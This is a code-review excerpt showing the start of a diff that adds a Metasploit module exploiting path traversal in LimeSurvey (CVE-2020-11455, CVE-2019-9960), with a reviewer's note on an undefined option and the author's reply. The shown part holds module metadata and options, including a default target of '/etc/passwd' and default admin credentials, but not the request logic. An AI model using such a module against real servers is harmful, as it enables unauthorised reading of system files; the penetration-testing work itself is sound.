modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb

```diff
@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "LimeSurvey Zip Path Traversals",
+      'Description'    => %q{
+        This module exploits an authenticated path traversal vulnerability found in LimeSurvey
+        versions between 4.0 and 4.1.11 with CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960,
+        inclusive.
+        In CVE-2020-11455 the getZipFile function within the filemanager functionality
+        allows for arbitrary file download.  The file retrieved may be deleted after viewing,
+        which was confirmed in testing.
+        In CVE-2019-9960 the szip function within the downloadZip functionality allows
+        for arbitrary file download.
+        Verified against 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328,
+        3.0.0-171222, and 2.70.0-170921.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'h00die', # msf module
+          'Matthew Aberegg',  # edb/discovery cve 2020
+          'Michael Burkey',   # edb/discovery cve 2020
+          'Federico Fernandez', #cve 2019
+          'Alejandro Parodi' # credited in cve 2019 writeup
+        ],
+      'References'     =>
+        [
+          # CVE-2020-11455
+          ['EDB', '48297'], # CVE-2020-11455
+          ['CVE', '2020-11455'],
+          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b'],
+          # CVE-2019-9960
+          ['CVE', '2019-9960'],
+          ['URL', 'https://www.secsignal.org/en/news/cve-2019-9960-arbitrary-file-download-in-limesurvey/'],
+          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/1ed10d3c423187712b8f6a8cb2bc9d5cc3b2deb8']
+        ],
+      'DisclosureDate' => "Apr 02 2020"
+    ))
+
+    register_options(
+      [
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]),
+        OptString.new('TARGETURI', [true, 'The base path to the LimeSurvey installation', '/']),
+        OptString.new('FILE', [true, 'The file to retrieve', '/etc/passwd']),
+        OptString.new('USERNAME', [true, 'LimeSurvey Username', 'admin']),
+        OptString.new('PASSWORD', [true, 'LimeSurvey Password', 'password'])
+      ])
+  end
+
+  def uri
+    datastore['URI']
```

Comment:
This option doesn't seem to be defined. `targeturi.path` instead?

Reply:
lol. i was wondering why my `set uri ...` was working, thought someone had aliased it at some point.  all fixed up :)